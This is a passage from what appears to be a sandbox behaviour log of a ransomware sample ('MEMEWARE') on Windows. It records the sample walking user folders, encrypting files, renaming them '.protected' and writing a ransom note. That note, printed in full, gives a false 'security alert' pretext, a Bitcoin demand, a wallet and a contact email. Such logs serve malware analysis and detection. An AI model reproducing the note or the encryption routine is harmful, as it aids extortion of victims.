pszDest="\\\\?\\C:\\Users\\Default\\Videos\\desktop.ini") returned 39 [0095.448] StrStrIW (lpFirst="desktop.ini", lpSrch=".protected") returned 0x0 [0095.448] lstrcmpW (lpString1="desktop.ini", lpString2="RESTORE_FILES.txt") returned -1 [0095.448] CryptGenRandom (in: hProv=0x444d38, dwLen=0x20, pbBuffer=0x295f12c | out: pbBuffer=0x295f12c) returned 1 [0095.448] CryptEncrypt (in: hKey=0x444cf8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x48ea38*, pdwDataLen=0x295f154*=0x20, dwBufLen=0x30 | out: pbData=0x48ea38*, pdwDataLen=0x295f154*=0x30) returned 1 [0095.448] CreateFileW (lpFileName="\\\\?\\C:\\Users\\Default\\Videos\\desktop.ini" (normalized: "c:\\users\\default\\videos\\desktop.ini"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xb4 [0095.449] lstrlenW (lpString="\\\\?\\C:\\Users\\Default\\Videos\\desktop.ini") returned 39 [0095.449] StrStrW (lpFirst="desktop.ini", lpSrch=".txt") returned 0x0 [0095.449] lstrlenW (lpString="\\\\?\\C:\\Users\\Default\\Videos\\desktop.ini") returned 39 [0095.449] StrStrW (lpFirst="desktop.ini", lpSrch=".rar") returned 0x0 [0095.449] lstrlenW (lpString="\\\\?\\C:\\Users\\Default\\Videos\\desktop.ini") returned 39 [0095.449] StrStrW (lpFirst="desktop.ini", lpSrch=".zip") returned 0x0 [0095.449] ReadFile (in: hFile=0xb4, lpBuffer=0x4a1458, nNumberOfBytesToRead=0x2800, lpNumberOfBytesRead=0x295f174, lpOverlapped=0x0 | out: lpBuffer=0x4a1458*, lpNumberOfBytesRead=0x295f174*=0x1f8, lpOverlapped=0x0) returned 1 [0095.449] SetFilePointerEx (in: hFile=0xb4, liDistanceToMove=0xfffffe08, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0095.449] WriteFile (in: hFile=0xb4, lpBuffer=0x4a1458*, nNumberOfBytesToWrite=0x1f8, lpNumberOfBytesWritten=0x295f174, lpOverlapped=0x0 | out: lpBuffer=0x4a1458*, lpNumberOfBytesWritten=0x295f174*=0x1f8, lpOverlapped=0x0) returned 1 [0095.450] SetFilePointerEx (in: hFile=0xb4, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0095.450] WriteFile (in: hFile=0xb4, lpBuffer=0x295f14c*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x295f174, lpOverlapped=0x0 | out: lpBuffer=0x295f14c*, lpNumberOfBytesWritten=0x295f174*=0x4, lpOverlapped=0x0) returned 1 [0095.450] WriteFile (in: hFile=0xb4, lpBuffer=0x48ea38*, nNumberOfBytesToWrite=0x30, lpNumberOfBytesWritten=0x295f174, lpOverlapped=0x0 | out: lpBuffer=0x48ea38*, lpNumberOfBytesWritten=0x295f174*=0x30, lpOverlapped=0x0) returned 1 [0095.450] CloseHandle (hObject=0xb4) returned 1 [0095.450] wnsprintfW (in: pszDest=0x4695e0, cchDest=32767, pszFmt="%s%s" | out: pszDest="\\\\?\\C:\\Users\\Default\\Videos\\desktop.ini.protected") returned 49 [0095.450] MoveFileW (lpExistingFileName="\\\\?\\C:\\Users\\Default\\Videos\\desktop.ini" (normalized: "c:\\users\\default\\videos\\desktop.ini"), lpNewFileName="\\\\?\\C:\\Users\\Default\\Videos\\desktop.ini.protected" (normalized: "c:\\users\\default\\videos\\desktop.ini.protected")) returned 1 [0095.450] FindNextFileW (in: hFindFile=0x47b990, lpFindFileData=0x295f190 | out: lpFindFileData=0x295f190) returned 0 [0095.450] FindClose (in: hFindFile=0x47b990 | out: hFindFile=0x47b990) returned 1 [0095.450] wnsprintfW (in: pszDest=0x47e9d8, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\Default\\Videos\\RESTORE_FILES.txt") returned 45 [0095.450] CreateFileW (lpFileName="\\\\?\\C:\\Users\\Default\\Videos\\RESTORE_FILES.txt" (normalized: "c:\\users\\default\\videos\\restore_files.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xa4 [0095.451] lstrlenA (lpString="! SYSTEM SECURITY ALERT !\r\n-----------------------------------------------------------------------------\r\nYour SERVER was tried to be attacked by an outsider.\r\nImmediatly change your password, use a minimum of 8 characters in length.\r\n-----------------------------------------------------------------------------\r\n\r\nAll your personal files was encrypted with RSA public key (1024 bit) to SAVE them from a third party persons. \r\nNow they are ENCRYPTED and SAFE!\r\n\r\nTo RESTORE all your files back immediatly, follow this few simple steps:\r\n\r\n1) Our SECURE-SERVER service charge a payment for file decryption and preventing damage of your SERVER by 3th party persons;\r\n2) After your SUCCESSFUL payment, write us an E-MAIL with your unique SERVER-ID and payment ID;\r\n3) Receive an DECRYPTION TOOL from us back to your E-MAIL;\r\n4) Run the tool on your SERVER and safe-decrypt all your files back to NORMAL state.\r\n\r\nWe STRONGLY RECOMMEND you NOT to use any other decryption tool, files will be LOST!\r\n\r\nWe guarantee:\r\n\r\n100% Successful restoring all of your files\r\n100% Satisfaction guarantee\r\n100% Safe and secure service\r\n\r\n------------------------------------------------------------------------------\r\n\r\nOur E-MAIL: secureserver@memeware.net\r\nPayment type: Bitcoin\r\nSum: $500\r\nOur wallet: 1CfMU2eKnajfpnYvLbWR3m7jZRXujtx8Cm\r\nYour SERVER-ID:\r\n") returned 1341 [0095.451] WriteFile (in: hFile=0xa4, lpBuffer=0xf01390*, nNumberOfBytesToWrite=0x53d, lpNumberOfBytesWritten=0x295f174, lpOverlapped=0x0 | out: lpBuffer=0xf01390*, lpNumberOfBytesWritten=0x295f174*=0x53d, lpOverlapped=0x0) returned 1 [0095.451] lstrlenA (lpString="/EUjl9MVeTXnlG/XQZNvwyITZa7BXUqiB5mj424hEYN2560qP6EWyldVLx6eKwW6WOEgf3pcjq0dW0RAvXRHEgiXZDUWQoLVVxw2NYqa6/J5djdAg1ybYJXnCAE12B7erROTQqHtc07YOrZdJvhx+3AjMJGsfnCSULXbX2/IqlW5UKzMzdVnUXFczFH9vnQaoI9XzVuBNbzMzJBoJR+ewiq+5nNFZL3ICdLtV523DicenBCgk1LFMBQUsrO3zbBh4mmsKg+skrUs+1Qc/9MGAUJlUVe23aJJKbQ6+IEVXuH184d/lapSkDKNbtrqWAqNhW9X8CAQhiOVyP+5+Qs2NqC778I4bzykfAS8xv8VVOY9XTkR6ym0EOqm1KYED9fJke16razCmo+CWD5Yq6NX3vZjkWOsbvFJcqdBpk89KPzvrYrv+JDljiezm3ysUD5K9W6+SzxYxurYTCPFLhUEyrh3UipsVj0LuMpJIZDAwy9qHbLfu/4CD+vlQc11WRi4xfoisfRvx5IZejrzHUM/5dd2AVbZVdN/j5PysPyy5fMniftmNAv01mZaTQGznUv1A/n+OUKJKLwmFHKdZSV3XI/czldNV04fTfL6V0w4ITxL/7dQB3cs/JrP7L/D2xolnVMHgCw8M8DhTu+OiDnJTlbwaAmPEiR18q12N+80Ckc=") returned 684 [0095.451] WriteFile (in: hFile=0xa4, lpBuffer=0x447448*, nNumberOfBytesToWrite=0x2ac, lpNumberOfBytesWritten=0x295f174, lpOverlapped=0x0 | out: lpBuffer=0x447448*, lpNumberOfBytesWritten=0x295f174*=0x2ac, lpOverlapped=0x0) returned 1 [0095.451] lstrlenA (lpString="\r\n------------------------------------------------------------------------------\r\nFor any questions, write us: secureserver@memeware.net\r\nMEMEWARE SECURE-SERVER SYSTEMS (c) 2018") returned 177 [0095.451] WriteFile (in: hFile=0xa4, lpBuffer=0xf018d0*, nNumberOfBytesToWrite=0xb1, lpNumberOfBytesWritten=0x295f174, lpOverlapped=0x0 | out: lpBuffer=0xf018d0*, lpNumberOfBytesWritten=0x295f174*=0xb1, lpOverlapped=0x0) returned 1 [0095.451] CloseHandle (hObject=0xa4) returned 1 [0095.452] FindNextFileW (in: hFindFile=0x47b950, lpFindFileData=0x295f400 | out: lpFindFileData=0x295f400) returned 0 [0095.452] FindClose (in: hFindFile=0x47b950 | out: hFindFile=0x47b950) returned 1 [0095.452] wnsprintfW (in: pszDest=0x4adad8, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\Default\\RESTORE_FILES.txt") returned 38 [0095.452] CreateFileW (lpFileName="\\\\?\\C:\\Users\\Default\\RESTORE_FILES.txt" (normalized: "c:\\users\\default\\restore_files.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x104 [0095.452] lstrlenA (lpString="! SYSTEM SECURITY ALERT !\r\n-----------------------------------------------------------------------------\r\nYour SERVER was tried to be attacked by an outsider.\r\nImmediatly change your password, use a minimum of 8 characters in length.\r\n-----------------------------------------------------------------------------\r\n\r\nAll your personal files was encrypted with RSA public key (1024 bit) to SAVE them from a third party persons. \r\nNow they are ENCRYPTED and SAFE!\r\n\r\nTo RESTORE all your files back immediatly, follow this few simple steps:\r\n\r\n1) Our SECURE-SERVER service charge a payment for file decryption and preventing damage of your SERVER by 3th party persons;\r\n2) After your SUCCESSFUL payment, write us an E-MAIL with your unique SERVER-ID and payment ID;\r\n3) Receive an DECRYPTION TOOL from us back to your E-MAIL;\r\n4) Run the tool on your SERVER and safe-decrypt all your files back to NORMAL state.\r\n\r\nWe STRONGLY RECOMMEND you NOT to use any other decryption tool, files will be LOST!\r\n\r\nWe guarantee:\r\n\r\n100% Successful restoring all of your files\r\n100% Satisfaction guarantee\r\n100% Safe and secure service\r\n\r\n------------------------------------------------------------------------------\r\n\r\nOur E-MAIL: secureserver@memeware.net\r\nPayment type: Bitcoin\r\nSum: $500\r\nOur wallet: 1CfMU2eKnajfpnYvLbWR3m7jZRXujtx8Cm\r\nYour SERVER-ID:\r\n") returned 1341 [0095.452] WriteFile (in: hFile=0x104, lpBuffer=0xf01390*, nNumberOfBytesToWrite=0x53d, lpNumberOfBytesWritten=0x295f3e4, lpOverlapped=0x0 | out: lpBuffer=0xf01390*, lpNumberOfBytesWritten=0x295f3e4*=0x53d, lpOverlapped=0x0) returned 1 [0095.453] lstrlenA (lpString="/EUjl9MVeTXnlG/XQZNvwyITZa7BXUqiB5mj424hEYN2560qP6EWyldVLx6eKwW6WOEgf3pcjq0dW0RAvXRHEgiXZDUWQoLVVxw2NYqa6/J5djdAg1ybYJXnCAE12B7erROTQqHtc07YOrZdJvhx+3AjMJGsfnCSULXbX2/IqlW5UKzMzdVnUXFczFH9vnQaoI9XzVuBNbzMzJBoJR+ewiq+5nNFZL3ICdLtV523DicenBCgk1LFMBQUsrO3zbBh4mmsKg+skrUs+1Qc/9MGAUJlUVe23aJJKbQ6+IEVXuH184d/lapSkDKNbtrqWAqNhW9X8CAQhiOVyP+5+Qs2NqC778I4bzykfAS8xv8VVOY9XTkR6ym0EOqm1KYED9fJke16razCmo+CWD5Yq6NX3vZjkWOsbvFJcqdBpk89KPzvrYrv+JDljiezm3ysUD5K9W6+SzxYxurYTCPFLhUEyrh3UipsVj0LuMpJIZDAwy9qHbLfu/4CD+vlQc11WRi4xfoisfRvx5IZejrzHUM/5dd2AVbZVdN/j5PysPyy5fMniftmNAv01mZaTQGznUv1A/n+OUKJKLwmFHKdZSV3XI/czldNV04fTfL6V0w4ITxL/7dQB3cs/JrP7L/D2xolnVMHgCw8M8DhTu+OiDnJTlbwaAmPEiR18q12N+80Ckc=") returned 684 [0095.453] WriteFile (in: hFile=0x104, lpBuffer=0x447448*, nNumberOfBytesToWrite=0x2ac, lpNumberOfBytesWritten=0x295f3e4, lpOverlapped=0x0 | out: lpBuffer=0x447448*, lpNumberOfBytesWritten=0x295f3e4*=0x2ac, lpOverlapped=0x0) returned 1 [0095.453] lstrlenA (lpString="\r\n------------------------------------------------------------------------------\r\nFor any questions, write us: secureserver@memeware.net\r\nMEMEWARE SECURE-SERVER SYSTEMS (c) 2018") returned 177 [0095.453] WriteFile (in: hFile=0x104, lpBuffer=0xf018d0*, nNumberOfBytesToWrite=0xb1, lpNumberOfBytesWritten=0x295f3e4, lpOverlapped=0x0 | out: lpBuffer=0xf018d0*, lpNumberOfBytesWritten=0x295f3e4*=0xb1, lpOverlapped=0x0) returned 1 [0095.453] CloseHandle (hObject=0x104) returned 1 [0095.453] FindNextFileW (in: hFindFile=0x47b910, lpFindFileData=0x295f670 | out: lpFindFileData=0x295f670) returned 1 [0095.453] lstrcmpiW (lpString1="Default User", lpString2="Windows") returned -1 [0095.453] lstrcmpiW (lpString1="Default User", lpString2="Program Files") returned -1 [0095.453] lstrcmpiW (lpString1="Default User", lpString2="Program Files (x86)") returned -1 [0095.453] lstrcmpiW (lpString1="Default User", lpString2="$Recycle.bin") returned 1 [0095.453] lstrcmpiW (lpString1="Default User", lpString2="System Volume Information") returned -1 [0095.453] wnsprintfW (in: pszDest=0x459508, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\Default User") returned 25 [0095.453] lstrcmpW (lpString1="Default User", lpString2=".") returned 1 [0095.453] lstrcmpW (lpString1="Default User", lpString2="..") returned 1 [0095.453] wnsprintfW (in: pszDest=0x4adad8, cchDest=32767, pszFmt="%s\\*" | out: pszDest="\\\\?\\C:\\Users\\Default User\\*") returned 27 [0095.453] FindFirstFileW (in: lpFileName="\\\\?\\C:\\Users\\Default User\\*", lpFindFileData=0x295f400 | out: lpFindFileData=0x295f400) returned 0xffffffff [0095.453] FindNextFileW (in: hFindFile=0x47b910, lpFindFileData=0x295f670 | out: lpFindFileData=0x295f670) returned 1 [0095.453] lstrcmpiW (lpString1="desktop.ini", lpString2="Windows") returned -1 [0095.453] lstrcmpiW (lpString1="desktop.ini", lpString2="Program Files") returned -1 [0095.453] lstrcmpiW (lpString1="desktop.ini", lpString2="Program Files (x86)") returned -1 [0095.453] lstrcmpiW (lpString1="desktop.ini", lpString2="$Recycle.bin") returned 1 [0095.453] lstrcmpiW (lpString1="desktop.ini", lpString2="System Volume Information") returned -1 [0095.453] wnsprintfW (in: pszDest=0x459508, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\desktop.ini") returned 24 [0095.453] StrStrIW (lpFirst="desktop.ini", lpSrch=".protected") returned 0x0 [0095.453] lstrcmpW (lpString1="desktop.ini", lpString2="RESTORE_FILES.txt") returned -1 [0095.453] CryptGenRandom (in: hProv=0x444d38, dwLen=0x20, pbBuffer=0x295f60c | out: pbBuffer=0x295f60c) returned 1 [0095.454] CryptEncrypt (in: hKey=0x444cf8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x48ea38*, pdwDataLen=0x295f634*=0x20, dwBufLen=0x30 | out: pbData=0x48ea38*, pdwDataLen=0x295f634*=0x30) returned 1 [0095.454] CreateFileW (lpFileName="\\\\?\\C:\\Users\\desktop.ini" (normalized: "c:\\users\\desktop.ini"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x104 [0095.454] lstrlenW (lpString="\\\\?\\C:\\Users\\desktop.ini") returned 24 [0095.454] StrStrW (lpFirst="desktop.ini", lpSrch=".txt") returned 0x0 [0095.454] lstrlenW (lpString="\\\\?\\C:\\Users\\desktop.ini") returned 24 [0095.454] StrStrW (lpFirst="desktop.ini", lpSrch=".rar") returned 0x0 [0095.454] lstrlenW (lpString="\\\\?\\C:\\Users\\desktop.ini") returned 24 [0095.454] StrStrW (lpFirst="desktop.ini", lpSrch=".zip") returned 0x0 [0095.454] ReadFile (in: hFile=0x104, lpBuffer=0x4a1458, nNumberOfBytesToRead=0x2800, lpNumberOfBytesRead=0x295f654, lpOverlapped=0x0 | out: lpBuffer=0x4a1458*, lpNumberOfBytesRead=0x295f654*=0xae, lpOverlapped=0x0) returned 1 [0095.454] SetFilePointerEx (in: hFile=0x104, liDistanceToMove=0xffffff52, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0095.454] WriteFile (in: hFile=0x104, lpBuffer=0x4a1458*, nNumberOfBytesToWrite=0xae, lpNumberOfBytesWritten=0x295f654, lpOverlapped=0x0 | out: lpBuffer=0x4a1458*, lpNumberOfBytesWritten=0x295f654*=0xae, lpOverlapped=0x0) returned 1 [0095.455] SetFilePointerEx (in: hFile=0x104, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0095.455] WriteFile (in: hFile=0x104, lpBuffer=0x295f62c*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x295f654, lpOverlapped=0x0 | out: lpBuffer=0x295f62c*, lpNumberOfBytesWritten=0x295f654*=0x4, lpOverlapped=0x0) returned 1 [0095.455] WriteFile (in: hFile=0x104, lpBuffer=0x48ea38*, nNumberOfBytesToWrite=0x30, lpNumberOfBytesWritten=0x295f654, lpOverlapped=0x0 | out: lpBuffer=0x48ea38*, lpNumberOfBytesWritten=0x295f654*=0x30, lpOverlapped=0x0) returned 1 [0095.455] CloseHandle (hObject=0x104) returned 1 [0095.456] wnsprintfW (in: pszDest=0x4adad8, cchDest=32767, pszFmt="%s%s" | out: pszDest="\\\\?\\C:\\Users\\desktop.ini.protected") returned 34 [0095.456] MoveFileW (lpExistingFileName="\\\\?\\C:\\Users\\desktop.ini" (normalized: "c:\\users\\desktop.ini"), lpNewFileName="\\\\?\\C:\\Users\\desktop.ini.protected" (normalized: "c:\\users\\desktop.ini.protected")) returned 1 [0095.456] FindNextFileW (in: hFindFile=0x47b910, lpFindFileData=0x295f670 | out: lpFindFileData=0x295f670) returned 1 [0095.456] lstrcmpiW (lpString1="Public", lpString2="Windows") returned -1 [0095.456] lstrcmpiW (lpString1="Public", lpString2="Program Files") returned 1 [0095.456] lstrcmpiW (lpString1="Public", lpString2="Program Files (x86)") returned 1 [0095.456] lstrcmpiW (lpString1="Public", lpString2="$Recycle.bin") returned 1 [0095.456] lstrcmpiW (lpString1="Public", lpString2="System Volume Information") returned -1 [0095.456] wnsprintfW (in: pszDest=0x459508, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\Public") returned 19 [0095.456] lstrcmpW (lpString1="Public", lpString2=".") returned 1 [0095.456] lstrcmpW (lpString1="Public", lpString2="..") returned 1 [0095.456] wnsprintfW (in: pszDest=0x4adad8, cchDest=32767, pszFmt="%s\\*" | out: pszDest="\\\\?\\C:\\Users\\Public\\*") returned 21 [0095.456] FindFirstFileW (in: lpFileName="\\\\?\\C:\\Users\\Public\\*", lpFindFileData=0x295f400 | out: lpFindFileData=0x295f400) returned 0x47b950 [0095.457] lstrcmpiW (lpString1=".", lpString2="Windows") returned -1 [0095.457] lstrcmpiW (lpString1=".", lpString2="Program Files") returned -1 [0095.457] lstrcmpiW (lpString1=".", lpString2="Program Files (x86)") returned -1 [0095.457] lstrcmpiW (lpString1=".", lpString2="$Recycle.bin") returned 1 [0095.457] lstrcmpiW (lpString1=".", lpString2="System Volume Information") returned -1 [0095.457] wnsprintfW (in: pszDest=0x4adad8, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\Public\\.") returned 21 [0095.457] lstrcmpW (lpString1=".", lpString2=".") returned 0 [0095.457] StrStrIW (lpFirst=".", lpSrch=".protected") returned 0x0 [0095.457] lstrcmpW (lpString1=".", lpString2="RESTORE_FILES.txt") returned -1 [0095.457] CryptGenRandom (in: hProv=0x444d38, dwLen=0x20, pbBuffer=0x295f39c | out: pbBuffer=0x295f39c) returned 1 [0095.457] CryptEncrypt (in: hKey=0x444cf8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x48ea38*, pdwDataLen=0x295f3c4*=0x20, dwBufLen=0x30 | out: pbData=0x48ea38*, pdwDataLen=0x295f3c4*=0x30) returned 1 [0095.457] CreateFileW (lpFileName="\\\\?\\C:\\Users\\Public\\." (normalized: "c:\\users\\public\\."), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0095.457] FindNextFileW (in: hFindFile=0x47b950, lpFindFileData=0x295f400 | out: lpFindFileData=0x295f400) returned 1 [0095.457] lstrcmpiW (lpString1="..", lpString2="Windows") returned -1 [0095.457] lstrcmpiW (lpString1="..", lpString2="Program Files") returned -1 [0095.457] lstrcmpiW (lpString1="..", lpString2="Program Files (x86)") returned -1 [0095.457] lstrcmpiW (lpString1="..", lpString2="$Recycle.bin") returned 1 [0095.457] lstrcmpiW (lpString1="..", lpString2="System Volume Information") returned -1 [0095.457] wnsprintfW (in: pszDest=0x4adad8, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\Public\\..") returned 22 [0095.457] lstrcmpW (lpString1="..", lpString2=".") returned 1 [0095.457] lstrcmpW (lpString1="..", lpString2="..") returned 0 [0095.457] StrStrIW (lpFirst="..", lpSrch=".protected") returned 0x0 [0095.457] lstrcmpW (lpString1="..", lpString2="RESTORE_FILES.txt") returned -1 [0095.457] CryptGenRandom (in: hProv=0x444d38, dwLen=0x20, pbBuffer=0x295f39c | out: pbBuffer=0x295f39c) returned 1 [0095.457] CryptEncrypt (in: hKey=0x444cf8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x48ea38*, pdwDataLen=0x295f3c4*=0x20, dwBufLen=0x30 | out: pbData=0x48ea38*, pdwDataLen=0x295f3c4*=0x30) returned 1 [0095.457] CreateFileW (lpFileName="\\\\?\\C:\\Users\\Public\\.." (normalized: "c:\\users"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0095.457] FindNextFileW (in: hFindFile=0x47b950, lpFindFileData=0x295f400 | out: lpFindFileData=0x295f400) returned 1 [0095.457] lstrcmpiW (lpString1="Desktop", lpString2="Windows") returned -1 [0095.457] lstrcmpiW (lpString1="Desktop", lpString2="Program Files") returned -1 [0095.457] lstrcmpiW (lpString1="Desktop", lpString2="Program Files (x86)") returned -1 [0095.457] lstrcmpiW (lpString1="Desktop", lpString2="$Recycle.bin") returned 1 [0095.457] lstrcmpiW (lpString1="Desktop", lpString2="System Volume Information") returned -1 [0095.457] wnsprintfW (in: pszDest=0x4adad8, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\Public\\Desktop") returned 27 [0095.457] lstrcmpW (lpString1="Desktop", lpString2=".") returned 1 [0095.457] lstrcmpW (lpString1="Desktop", lpString2="..") returned 1 [0095.458] wnsprintfW (in: pszDest=0x47e9d8, cchDest=32767, pszFmt="%s\\*" | out: pszDest="\\\\?\\C:\\Users\\Public\\Desktop\\*") returned 29 [0095.458] FindFirstFileW (in: lpFileName="\\\\?\\C:\\Users\\Public\\Desktop\\*", lpFindFileData=0x295f190 | out: lpFindFileData=0x295f190) returned 0x47b990 [0095.458] lstrcmpiW (lpString1=".", lpString2="Windows") returned -1 [0095.458] lstrcmpiW (lpString1=".", lpString2="Program Files") returned -1 [0095.458] lstrcmpiW (lpString1=".", lpString2="Program Files (x86)") returned -1 [0095.458] lstrcmpiW (lpString1=".", lpString2="$Recycle.bin") returned 1 [0095.458] lstrcmpiW (lpString1=".", lpString2="System Volume Information") returned -1 [0095.458] wnsprintfW (in: pszDest=0x47e9d8, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\Public\\Desktop\\.") returned 29 [0095.458] lstrcmpW (lpString1=".", lpString2=".") returned 0 [0095.458] StrStrIW (lpFirst=".", lpSrch=".protected") returned 0x0 [0095.458] lstrcmpW (lpString1=".", lpString2="RESTORE_FILES.txt") returned -1 [0095.458] CryptGenRandom (in: hProv=0x444d38, dwLen=0x20, pbBuffer=0x295f12c | out: pbBuffer=0x295f12c) returned 1 [0095.458] CryptEncrypt (in: hKey=0x444cf8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x48ea38*, pdwDataLen=0x295f154*=0x20, dwBufLen=0x30 | out: pbData=0x48ea38*, pdwDataLen=0x295f154*=0x30) returned 1 [0095.458] CreateFileW (lpFileName="\\\\?\\C:\\Users\\Public\\Desktop\\." (normalized: "c:\\users\\public\\desktop\\."), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0095.458] FindNextFileW (in: hFindFile=0x47b990, lpFindFileData=0x295f190 | out: lpFindFileData=0x295f190) returned 1 [0095.458] lstrcmpiW (lpString1="..", lpString2="Windows") returned -1 [0095.458] lstrcmpiW (lpString1="..", lpString2="Program Files") returned -1 [0095.458] lstrcmpiW (lpString1="..", lpString2="Program Files (x86)") returned -1 [0095.458] lstrcmpiW (lpString1="..", lpString2="$Recycle.bin") returned 1 [0095.459] lstrcmpiW (lpString1="..", lpString2="System Volume Information") returned -1 [0095.459] wnsprintfW (in: pszDest=0x47e9d8, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\Public\\Desktop\\..") returned 30 [0095.459] lstrcmpW (lpString1="..", lpString2=".") returned 1 [0095.459] lstrcmpW (lpString1="..", lpString2="..") returned 0 [0095.459] StrStrIW (lpFirst="..", lpSrch=".protected") returned 0x0 [0095.459] lstrcmpW (lpString1="..", lpString2="RESTORE_FILES.txt") returned -1 [0095.459] CryptGenRandom (in: hProv=0x444d38, dwLen=0x20, pbBuffer=0x295f12c | out: pbBuffer=0x295f12c) returned 1 [0095.459] CryptEncrypt (in: hKey=0x444cf8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x48ea38*, pdwDataLen=0x295f154*=0x20, dwBufLen=0x30 | out: pbData=0x48ea38*, pdwDataLen=0x295f154*=0x30) returned 1 [0095.459] CreateFileW (lpFileName="\\\\?\\C:\\Users\\Public\\Desktop\\.." (normalized: "c:\\users\\public"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0095.459] FindNextFileW (in: hFindFile=0x47b990, lpFindFileData=0x295f190 | out: lpFindFileData=0x295f190) returned 1 [0095.459] lstrcmpiW (lpString1="Adobe Reader X.lnk", lpString2="Windows") returned -1 [0095.459] lstrcmpiW (lpString1="Adobe Reader X.lnk", lpString2="Program Files") returned -1 [0095.459] lstrcmpiW (lpString1="Adobe Reader X.lnk", lpString2="Program Files (x86)") returned -1 [0095.459] lstrcmpiW (lpString1="Adobe Reader X.lnk", lpString2="$Recycle.bin") returned 1 [0095.459] lstrcmpiW (lpString1="Adobe Reader X.lnk", lpString2="System Volume Information") returned -1 [0095.459] wnsprintfW (in: pszDest=0x47e9d8, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\Public\\Desktop\\Adobe Reader X.lnk") returned 46 [0095.459] StrStrIW (lpFirst="Adobe Reader X.lnk", lpSrch=".protected") returned 0x0 [0095.459] lstrcmpW (lpString1="Adobe Reader X.lnk", lpString2="RESTORE_FILES.txt") returned -1 [0095.459] CryptGenRandom (in: hProv=0x444d38, dwLen=0x20, pbBuffer=0x295f12c | out: pbBuffer=0x295f12c) returned 1 [0095.459] CryptEncrypt (in: hKey=0x444cf8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x48ea38*, pdwDataLen=0x295f154*=0x20, dwBufLen=0x30 | out: pbData=0x48ea38*, pdwDataLen=0x295f154*=0x30) returned 1 [0095.459] CreateFileW (lpFileName="\\\\?\\C:\\Users\\Public\\Desktop\\Adobe Reader X.lnk" (normalized: "c:\\users\\public\\desktop\\adobe reader x.lnk"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xb4 [0095.459] lstrlenW (lpString="\\\\?\\C:\\Users\\Public\\Desktop\\Adobe Reader X.lnk") returned 46 [0095.459] StrStrW (lpFirst="Adobe Reader X.lnk", lpSrch=".txt") returned 0x0 [0095.459] lstrlenW (lpString="\\\\?\\C:\\Users\\Public\\Desktop\\Adobe Reader X.lnk") returned 46 [0095.459] StrStrW (lpFirst="Adobe Reader X.lnk", lpSrch=".rar") returned 0x0 [0095.459] lstrlenW (lpString="\\\\?\\C:\\Users\\Public\\Desktop\\Adobe Reader X.lnk") returned 46 [0095.460] StrStrW (lpFirst="Adobe Reader X.lnk", lpSrch=".zip") returned 0x0 [0095.460] ReadFile (in: hFile=0xb4, lpBuffer=0x4a1458, nNumberOfBytesToRead=0x2800, lpNumberOfBytesRead=0x295f174, lpOverlapped=0x0 | out: lpBuffer=0x4a1458*, lpNumberOfBytesRead=0x295f174*=0x7e9, lpOverlapped=0x0) returned 1 [0095.460] SetFilePointerEx (in: hFile=0xb4, liDistanceToMove=0xfffff817, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0095.460] WriteFile (in: hFile=0xb4, lpBuffer=0x4a1458*, nNumberOfBytesToWrite=0x7e9, lpNumberOfBytesWritten=0x295f174, lpOverlapped=0x0 | out: 